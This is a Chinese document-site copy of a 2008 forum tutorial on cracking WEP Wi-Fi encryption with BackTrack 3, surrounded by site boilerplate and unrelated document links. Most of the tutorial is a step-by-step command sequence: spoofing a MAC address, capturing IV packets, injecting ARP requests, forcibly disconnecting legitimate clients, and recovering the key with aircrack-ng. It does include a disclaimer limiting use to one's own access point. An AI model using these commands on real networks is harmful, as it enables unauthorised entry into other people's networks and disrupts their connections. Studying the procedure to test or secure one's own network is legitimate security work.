- 1、本文档共13页,可阅读全部内容。
- 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
BT3破解无线WEP_WPA2
BT3破解无线WEP_WPA2
声明:任何不经别人同意而进入别人网络都是非法和不道德的行为。
本教程用于学习和交流,如要实验请拿自已的AP开刀!!
题记:
本人是中国无线门户无线安全版块ID
“David98”,首先感谢版主longas还有像liyg、hrb011011、wifi和小
草等众多热心坛友的支持。
无线安全版块一直是本坛一个特殊而重要的版块,本版高手如
云,各类无线破解教程纷呈,但一直缺乏一个系统、全面而可理解和
学习的教程。我根据各位坛友的教程和自己的理解整理编辑成这篇
《BT3破解无线WEP/WPA教程》。
由于本人也是初学者,缺乏专业的理论知识,因此文中不免存在理
解的偏差甚至错误,希望各位朋友指正。
最后希望更多的朋友参与到教程的整理和编辑中,不断把教程修
正和完善。
对无线WEP和WPA 破解有兴趣的朋友也可加入QQ群:起交流。
谢谢!!
David98
08年5月22日
中国无线门户David98出品
Anywhere WLAN!! 3
WEP破解
1.装备: IMBX60笔记本(内置Intel3945 无线网卡)、BT3 的U盘系统(需用syslinux命令来指定启动
BT3 的盘符)
2.用户名:root密码:toor,进入图形界面:startx。启动BT3 后,(启动黑屏:xconf再输入startx)
3.加载3945 网卡的驱动。打开一个shell
输入 modprobe –r iwl3945
输入 modprobe ipwraw
注:不同的网卡有不同的加载方式
4. 查找目标:
用Airoscript命令(Backtrack/radio network analysis/80211/all/Aioscript)的扫描功能
连续三次都选择1 发现5个,有4 个加密,data 都是0,开放的netgear 那个AP有一个客户端。PWR
值一般看出信号强度。也可以用airodump-ng wifi0 来有哪些信誉好的足球投注网站
我们选择第一个作为目标,channel为11(上图中的CH 代表信道)。
中国无线门户David98出品
Anywhere WLAN!! 4
注:修改自己网卡的MAC地址的命令。
输入macchanger –m 00:11:22:33:44:55 wifi0
5.激活网卡的Monitor模式并工作在11 信道。(加载网卡,激活监听模式,工作在11 信道)
输入 airmon-ng start wifi0 11 也可用iwconfi wifi0 来查看网卡的工作模式和工作信道。
可用aireplay-ng --test wifi0 来测试是否可以注入
中国无线门户David98出品
Anywhere WLAN!! 5
6.输入截取数据包命令(截取11 信道的ivs数据包,并保存名为name.ivs)
输入命令 airodump-ng --ivs -w name -c 11 wifi0 ,
(--ivs:仅截取ivs数据包,-w:写入文件,-c:截取ivs的信道)
(其中name是获取的ivs 的保存文件的名字,11 是channel值,你根据实际修改)
一. 有客户端WEP 破解
1.有客户端,且合法客户端产生大量有效的数据,能直接获得大量IVS。
思路:1-6步同上
7.直接用aircrack-ng破解
第七步: aircrack-ng -n 64 -b ap mac name-01.ivs
中国无线门户David98出品
Anywhere WLAN!! 6
2.有客户端,合法客户端只能产生少量ivs 数据,就需要注入攻击加速产生大量ivs。
只要有少量的数据就可能获得arp 请求包,则可用arp 注入模式的-3 模式通过不断向AP 发送
同样的arp请求包,来进行注入式攻击。
思路:1-6步同上
7.用aireplay-ng的arp注入方式获得大量的ivs
第七步:aireplay-ng -3 -b ap mac -h 合法客户端 mac wifi0
注:这一步可能时间会长一点,因为需要等到ARP。
中国无线门户David98出品
Anywhere WLAN!! 7
3.有客户端,但是客户端根本不在通信,不能产生ARP包。-3注入模式不成功
思路:1-6步同上
7.-0 冲突模式强制断开合法客户端和ap连接,使之重新连接
8.利用-0冲突模式重新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入
第七步:aireplay-ng -3 -b ap mac -h 合法客户端 mac wifi0
第八步:aireplay-ng -0 10 –a ap mac -c 合法客户端 mac wifi0
中国无线门户David98出品
Anywhere WLAN!! 8
4
您可能关注的文档
- 2009年幼儿教师培训计划.doc
- 200种平价好货~shopping~.doc
- 2010-2011初一生物竞赛试卷.doc
- 2010.03.27 [建筑教育三题].南萧亭(2001.5.29).ABBS.doc
- 2010.5 巧用实施万用板布线——用Protel 99 SE玩转“洞洞板”.doc
- 2010.6四级听力真题技巧透析.doc
- 2010CET4抢分制胜宝典2.doc
- 2010~2011年黄高高一寒假语文作业.doc
- 2010《电磁场与电磁波》复习指南.doc
- 2010上海秋冬作品展在800show上映_大码女装网.doc
- 《中国通史》文字稿第12集春秋争霸.docx
- java教程--类与对象-讲义课件(演讲稿).ppt
- Vue应用程序开发-(1).pptx
- 东北师大版社劳动实践与评价指导手册一年级上册主题二活动一寻找五彩的树叶课时课件.pptx
- 外研版英语四年级上册 Module 4 Unit 2 How much is it单元教学设计.docx
- 外研版英语四年级上册Module 4 单元整体教学设计.docx
- 6《上课之前》课件 鄂科技版 心理健康教育一年级.pptx
- 《1~5的认识》说课课件(共25张PPT)人教版一年级上册数学.pptx
- 六《解决问题(1)》说课课件 人教版 三年级上册数学.pptx
- 七《解决问题》说课课件 人教版 二年级上册数学.pptx
文档评论(0)